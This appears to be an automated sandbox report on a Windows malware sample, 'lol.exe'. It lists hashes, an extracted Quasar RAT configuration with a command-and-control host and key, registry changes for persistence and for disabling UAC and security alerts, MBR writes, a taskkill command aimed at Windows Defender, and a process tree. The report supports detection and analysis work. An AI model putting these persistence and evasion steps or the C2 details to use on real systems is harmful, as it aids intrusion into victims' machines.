Analysis
max time kernel: 478s
max time network: 482s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 23-05-2024 15:35
Errors
General
Target: lol.exe
Size: 13.1MB
MD5: 621d4a616715d165ed2c10e48e5fd94b
SHA1: 7fabfdb5167e59d0442df460e1b236cb5bc75fbe
SHA256: 7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde
SHA512: 793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442
SSDEEP: 196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
encryption_key: E1BF1D99459F04CAF668F054744BC2C514B0A3D6
install_name: Romilyaa.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Windows 10 Boot
subdirectory: SubDir
Signatures
Detect Umbral payload 1 IoCs
Processes:
resource: C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\SolaraBootstraper.exe, yara_rule: family_umbral
Modifies WinLogon for persistence 2 TTPs 1 IoCs
Processes:
Rover.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, C:\\Program Files (x86)\\rover\\rover.exe"
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
Processes:
ccqytjrniv.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1"
Modifies visibility of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
ccqytjrniv.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"
Quasar payload 2 IoCs
Processes:
resource: C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\scary.exe, yara_rule: family_quasar
resource: behavioral1/memory/5604-2375-0x0000000000BA0000-0x0000000000EC4000-memory.dmp, yara_rule: family_quasar
Processes:
Rover.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Processes:
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"
Disables RegEdit via registry modification 1 IoCs
Processes:
ccqytjrniv.exe: Set value (int) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"
Drops file in Drivers directory 1 IoCs
Processes:
Rover.exe: File opened for modification C:\Windows\SysWOW64\drivers\afunix.sys
Manipulates Digital Signatures 1 IoCs
Attackers can apply techniques such as modifying certain DLL exports to make their binary seem valid.
Processes:
Rover.exe: File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\pwrshsip.dll
Sets file execution options in registry 2 TTPs 16 IoCs
Processes:
msiexec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe\DisableExceptionChainValidation = "0"
msiexec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\DisableExceptionChainValidation = "0"
msiexec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe
msiexec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe\DisableExceptionChainValidation = "0"
msiexec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe
MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe
MsiExec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32Info.exe\MitigationOptions = "256"
msiexec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe\DisableExceptionChainValidation = "0"
MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe
MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe
MsiExec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrServicesUpdater.exe\MitigationOptions = "256"
msiexec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe
msiexec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe
MsiExec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AcroRd32.exe\MitigationOptions = "256"
MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe
MsiExec.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RdrCEF.exe\MitigationOptions = "256"
.NET Reactor protector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Executes dropped EXE 21 IoCs
Processes (pid process):
3568 loader.exe
1360 Rover.exe
5604 scary.exe
5360 the.exe
5700 Romilyaa.exe
5900 ac3.exe
5652 jaffa.exe
796 ccqytjrniv.exe
1768 sphkjhlphydlbbz.exe
3308 oxurcpmxhhmap.exe
2784 xpxlzrjv.exe
5580 xpxlzrjv.exe
5048 packer.exe
2164 RdrServicesUpdater.exe
2320 AcroRd32.exe
5436 RdrCEF.exe
3068 RdrCEF.exe
5964 RdrCEF.exe
3912 RdrCEF.exe
744 RdrCEF.exe
5740 RdrCEF.exe
Loads dropped DLL 64 IoCs
Modifies file permissions 1 TTPs 1 IoCs
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Registers COM server for autorun 1 TTPs 6 IoCs
Processes:
MsiExec.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32\ThreadingModel = "Apartment"
MsiExec.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32\ = "C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDFImpl64.dll"
MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\InprocServer32
MsiExec.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\InprocServer32\ = "C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF64.dll"
MsiExec.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{CA8A9780-280D-11CF-A24D-444553540000}\InprocServer32\ThreadingModel = "Apartment"
MsiExec.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F0B4F6AD-5E09-4CB1-B763-EC390CBDE51D}\InprocServer32
Processes:
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirstRunDisabled = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
sphkjhlphydlbbz.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hihvoizn = "ccqytjrniv.exe"
sphkjhlphydlbbz.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\nzvjfgtz = "sphkjhlphydlbbz.exe"
sphkjhlphydlbbz.exe: Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "oxurcpmxhhmap.exe"
Processes:
Rover.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"
Rover.exe: Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCDisable = "4294967197"
ccqytjrniv.exe: Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SFCScan = "0"
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
Rover.exe: File opened for modification \??\PhysicalDrive0
AutoIT Executable 11 IoCs
AutoIT scripts compiled to PE executables.
Processes (resource, yara_rule autoit_exe):
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\ac3.exe
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\jaffa.exe
C:\Windows\SysWOW64\ccqytjrniv.exe
C:\Windows\SysWOW64\xpxlzrjv.exe
C:\Windows\SysWOW64\oxurcpmxhhmap.exe
C:\Windows\SysWOW64\sphkjhlphydlbbz.exe
C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exe
C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exe
C:\Users\Admin\Documents\MergeEnter.doc.exe
\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe
\??\c:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc.exe
Drops file in System32 directory 64 IoCs
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exe
pid pid_target process target process
5952 5048 WerFault.exe packer.exe
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
msinfo32.exe
description ioc process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 msinfo32.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID msinfo32.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs msinfo32.exe
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 msinfo32.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID msinfo32.exe
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs msinfo32.exe
-
Checks processor information in registry 2 TTPs 19 IoCs
Processor information is often read in order to detect sandboxing environments.
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exe schtasks.exe
pid process
5368 schtasks.exe
5888 schtasks.exe
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exe timeout.exe timeout.exe
pid process
4632 timeout.exe
3832 timeout.exe
5952 timeout.exe
-
Enumerates system info in registry 2 TTPs 9 IoCs
Processes:
WINWORD.EXE msedge.exe msinfo32.exe
description ioc process
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msinfo32.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msinfo32.exe
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\ECFirmwareMajorRelease msinfo32.exe
-
Kills process with taskkill 4 IoCs
Processes:
taskkill.exe taskkill.exe taskkill.exe taskkill.exe
pid process
4420 taskkill.exe
5988 taskkill.exe
5540 taskkill.exe
5984 taskkill.exe
-
Modifies data under HKEY_USERS 18 IoCs
Modifies registry class 64 IoCs
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid   process
4572  NOTEPAD.EXE
Suspicious behavior: AddClipboardFormatListener 3 IoCs
Processes:
pid   process
5716  WINWORD.EXE
5716  WINWORD.EXE
480   vlc.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid   process  (consecutive identical rows collapsed; count in parentheses)
2788  msedge.exe  (x2)
3108  msedge.exe  (x2)
6120  msedge.exe  (x2)
3400  identity_helper.exe  (x2)
5368  powershell.exe  (x3)
5652  jaffa.exe  (x16)
1768  sphkjhlphydlbbz.exe  (x2)
796   ccqytjrniv.exe  (x2)
1768  sphkjhlphydlbbz.exe  (x4)
796   ccqytjrniv.exe  (x2)
1768  sphkjhlphydlbbz.exe  (x2)
796   ccqytjrniv.exe  (x4)
2784  xpxlzrjv.exe  (x2)
796   ccqytjrniv.exe  (x2)
2784  xpxlzrjv.exe  (x6)
3308  oxurcpmxhhmap.exe  (x11)
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
pid   process
5900  ac3.exe
480   vlc.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
pid   process  (consecutive identical rows collapsed; count in parentheses)
3108  msedge.exe  (x6)
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description  pid  process  (consecutive identical rows collapsed; count in parentheses)
Token: SeDebugPrivilege  4420  taskkill.exe
Token: SeDebugPrivilege  1360  Rover.exe
Token: SeDebugPrivilege  5604  scary.exe
Token: SeDebugPrivilege  5988  taskkill.exe
Token: SeDebugPrivilege  5540  taskkill.exe
Token: SeDebugPrivilege  5700  Romilyaa.exe
Token: SeDebugPrivilege  5984  taskkill.exe
Token: SeSystemtimePrivilege  564  cmd.exe  (x2)
Token: SeDebugPrivilege  5368  powershell.exe
Token: 33  5444  AUDIODG.EXE
Token: SeIncBasePriorityPrivilege  5444  AUDIODG.EXE
Token: SeDebugPrivilege  1360  Rover.exe
Token: SeTakeOwnershipPrivilege  1360  Rover.exe  (x51)
Suspicious use of FindShellTrayWindow 62 IoCs
Processes:
pid   process  (consecutive identical rows collapsed; count in parentheses)
3108  msedge.exe  (x25)
5700  Romilyaa.exe
5652  jaffa.exe  (x3)
1768  sphkjhlphydlbbz.exe  (x3)
796   ccqytjrniv.exe  (x3)
2784  xpxlzrjv.exe  (x3)
3308  oxurcpmxhhmap.exe  (x3)
5580  xpxlzrjv.exe  (x3)
3108  msedge.exe
480   vlc.exe  (x10)
1360  Rover.exe
2320  AcroRd32.exe
5840  firefox.exe  (x4)
5700  Romilyaa.exe
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
pid   process  (consecutive identical rows collapsed; count in parentheses)
3108  msedge.exe  (x12)
5700  Romilyaa.exe
5652  jaffa.exe  (x3)
1768  sphkjhlphydlbbz.exe  (x3)
796   ccqytjrniv.exe  (x3)
2784  xpxlzrjv.exe  (x3)
3308  oxurcpmxhhmap.exe  (x3)
5580  xpxlzrjv.exe  (x3)
480   vlc.exe  (x9)
5840  firefox.exe  (x3)
1360  Rover.exe  (x4)
5700  Romilyaa.exe
Suspicious use of SetWindowsHookEx 29 IoCs
Processes:
pid   process  (consecutive identical rows collapsed; count in parentheses)
5700  Romilyaa.exe
5716  WINWORD.EXE  (x7)
480   vlc.exe
2320  AcroRd32.exe  (x8)
5840  firefox.exe  (x10)
2964  LogonUI.exe  (x2)
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description  pid  process  target process  (consecutive identical rows collapsed; count in parentheses)
PID 236 wrote to memory of 3568  236  lol.exe  loader.exe  (x2)
PID 3568 wrote to memory of 5056  3568  loader.exe  cmd.exe  (x2)
PID 5056 wrote to memory of 564  5056  cmd.exe  cmd.exe  (x2)
PID 564 wrote to memory of 4420  564  cmd.exe  taskkill.exe  (x2)
PID 564 wrote to memory of 1360  564  cmd.exe  Rover.exe  (x3)
PID 564 wrote to memory of 3108  564  cmd.exe  msedge.exe  (x2)
PID 3108 wrote to memory of 2952  3108  msedge.exe  msedge.exe  (x2)
PID 564 wrote to memory of 3952  564  cmd.exe  WScript.exe  (x2)
PID 3108 wrote to memory of 2260  3108  msedge.exe  msedge.exe  (x40)
PID 3108 wrote to memory of 2788  3108  msedge.exe  msedge.exe  (x2)
PID 3108 wrote to memory of 3656  3108  msedge.exe  msedge.exe  (x5)
System policy modification 1 TTPs 2 IoCs
Processes:
description  ioc  process
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken = "1"  Rover.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"  Rover.exe
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe (depth 1)
Command line: "C:\Users\Admin\AppData\Local\Temp\lol.exe"
- Suspicious use of WriteProcessMemory
PID:236 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\loader.exe (depth 2)
Command line: "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\loader.exe"
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3568 -
C:\Windows\system32\cmd.exe (depth 3)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\temp.bat" "
- Suspicious use of WriteProcessMemory
PID:5056 -
C:\Windows\system32\cmd.exe (depth 4)
Command line: C:\Windows\system32\cmd.exe /K main.cmd
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:564 -
C:\Windows\system32\taskkill.exe (depth 5)
Command line: taskkill /f /im WindowsDefender.exe
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4420 -
C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\Rover.exe (depth 5)
Command line: Rover.exe
- Modifies WinLogon for persistence
- UAC bypass
- Drops file in Drivers directory
- Manipulates Digital Signatures
- Executes dropped EXE
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- System policy modification
PID:1360 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 5)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\web.htm
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3108 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff826ce3cb8,0x7ff826ce3cc8,0x7ff826ce3cd8
PID:2952
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
PID:2260
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2368 /prefetch:3
- Suspicious behavior: EnumeratesProcesses
PID:2788 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2628 /prefetch:8
PID:3656
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:1
PID:3308
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3168 /prefetch:1
PID:3576
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
PID:592
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5048 /prefetch:1
PID:4896
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:1
PID:5216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4368 /prefetch:1
PID:1180
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5196 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
PID:6120 -
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5772 /prefetch:8
- Suspicious behavior: EnumeratesProcesses
PID:3400 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (depth 6)
Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,13714908696335653000,11288915228398804749,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
PID:4740
-
C:\Windows\System32\WScript.exe (depth 5)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_108150a3-91ae-442f-a8e8-b746ea6aebd5\helper.vbs"
PID:3952
-
